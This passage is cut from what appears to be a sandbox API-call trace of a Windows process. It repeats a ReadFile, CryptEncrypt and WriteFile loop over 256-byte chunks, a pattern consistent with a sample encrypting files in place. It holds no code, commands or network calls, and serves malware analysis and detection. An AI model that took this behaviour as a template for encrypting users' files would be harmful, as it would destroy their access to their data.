lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.589] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.590] GetLastError () returned 0x0 [0144.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.590] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.590] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.590] GetLastError () returned 0x0 [0144.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.590] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.590] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.590] GetLastError () returned 0x0 [0144.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.590] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.590] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.590] GetLastError () returned 0x0 [0144.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.590] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.590] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.590] GetLastError () returned 0x0 [0144.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.590] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.590] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.590] GetLastError () returned 0x0 [0144.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.590] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.590] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.590] GetLastError () returned 0x0 [0144.590] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.590] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.591] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.591] GetLastError () returned 0x0 [0144.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.591] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.591] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.591] GetLastError () returned 0x0 [0144.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.591] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.591] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.591] GetLastError () returned 0x0 [0144.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.591] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.591] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.591] GetLastError () returned 0x0 [0144.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.591] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.591] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.591] GetLastError () returned 0x0 [0144.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.591] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.591] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.591] GetLastError () returned 0x0 [0144.591] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.591] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.592] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.592] GetLastError () returned 0x0 [0144.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.592] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.592] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.592] GetLastError () returned 0x0 [0144.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.592] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.592] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.592] GetLastError () returned 0x0 [0144.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.592] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.592] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.592] GetLastError () returned 0x0 [0144.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.592] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.592] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.592] GetLastError () returned 0x0 [0144.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.592] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.592] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.592] GetLastError () returned 0x0 [0144.592] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.592] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.592] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.592] GetLastError () returned 0x0 [0144.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.593] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.593] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.593] GetLastError () returned 0x0 [0144.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.593] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.593] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.593] GetLastError () returned 0x0 [0144.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.593] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.593] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.593] GetLastError () returned 0x0 [0144.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.593] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.593] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.593] GetLastError () returned 0x0 [0144.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.593] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.593] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.593] GetLastError () returned 0x0 [0144.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.593] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.593] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.593] GetLastError () returned 0x0 [0144.593] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.593] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.594] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.594] GetLastError () returned 0x0 [0144.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.594] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.594] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.594] GetLastError () returned 0x0 [0144.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.594] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.594] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.594] GetLastError () returned 0x0 [0144.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.594] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.594] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.594] GetLastError () returned 0x0 [0144.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.594] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.594] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.594] GetLastError () returned 0x0 [0144.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.594] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.594] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466ed0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.594] GetLastError () returned 0x0 [0144.594] WriteFile (in: hFile=0x588, lpBuffer=0x1d466ed0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466ed0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.594] ReadFile (in: hFile=0x1624, lpBuffer=0x1d466dc8, nNumberOfBytesToRead=0x100, 